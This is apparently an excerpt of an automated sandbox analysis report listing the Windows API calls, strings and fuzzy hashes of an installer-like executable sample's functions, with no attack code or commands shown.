                                                                • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                              • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                              • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF561FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                              • String ID: Setup
                                                              • API String ID: 629812316-3839654196
                                                              • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                              • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                              • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                              • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
                                                              APIs
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: QueryValue
                                                              • String ID: $=H
                                                              • API String ID: 3660427363-3538597426
                                                              • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                              • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                              • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                              • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                              APIs
                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID: .tmp
                                                              • API String ID: 1375471231-2986845003
                                                              • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                              • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                              • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                              • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                              APIs
                                                                • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                              • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                              • String ID: SHGetKnownFolderPath$shell32.dll
                                                              • API String ID: 3869789854-2936008475
                                                              • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                              • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                              • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                              • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                              APIs
                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: RegisteredOrganization$RegisteredOwner
                                                              • API String ID: 3535843008-1113070880
                                                              • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                              • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                              • Opcode Fuzzy Hash: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                              • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateErrorFileHandleLast
                                                              • String ID: CreateFile
                                                              • API String ID: 2528220319-823142352
                                                              • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                              • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                              • Opcode Fuzzy Hash: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                              • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                              APIs
                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID: System\CurrentControlSet\Control\Windows$;H
                                                              • API String ID: 71445658-2565060666
                                                              • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                              • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                              • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                              • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                              APIs
                                                                • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                              • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                              • String ID: SHCreateItemFromParsingName$shell32.dll
                                                              • API String ID: 2906209438-2320870614
                                                              • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                              • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                              • Opcode Fuzzy Hash: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                              • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                              APIs
                                                                • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                              • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressErrorLibraryLoadModeProc
                                                              • String ID: SHPathPrepareForWriteA$shell32.dll
                                                              • API String ID: 2492108670-2683653824
                                                              • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                              • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                              • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                              • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                              APIs
                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID:
                                                              • API String ID: 2574300362-0
                                                              • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                              • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                              • Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                              • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                              APIs
                                                              • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                              • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                              • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Menu$Append$System
                                                              • String ID:
                                                              • API String ID: 1489644407-0
                                                              • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                              • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
                                                              • Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                              • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
                                                              APIs
                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                              • TranslateMessage.USER32(?), ref: 0042448F
                                                              • DispatchMessageA.USER32(?), ref: 00424499
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Message$DispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 4217535847-0
                                                              • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                              • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                              • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                              • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                              APIs
                                                              • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                              • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Prop$Window
                                                              • String ID:
                                                              • API String ID: 3363284559-0
                                                              • Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                              • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                              • Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                              • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 0041EE64
                                                              • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                              • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$EnableEnabledVisible
                                                              • String ID:
                                                              • API String ID: 3234591441-0
                                                              • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                              • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                              • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                              • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                              APIs
                                                              • SetActiveWindow.USER32(?), ref: 0046A02D
                                                              Strings
                                                              Similarity
                                                              • API ID: ActiveWindow
                                                              • String ID: PrepareToInstall
                                                              • API String ID: 2558294473-1101760603
                                                              • Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                              • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                              • Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                              • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: /:*?"<>|
                                                              • API String ID: 0-4078764451
                                                              • Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                              • Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
                                                              • Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                              • Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
                                                              APIs
                                                              • SetActiveWindow.USER32(?), ref: 00482676
                                                              Strings
                                                              Similarity
                                                              • API ID: ActiveWindow
                                                              • String ID: InitializeWizard
                                                              • API String ID: 2558294473-2356795471
                                                              • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                              • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                              • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                              • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion
                                                              • API String ID: 47109696-1019749484
                                                              • Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
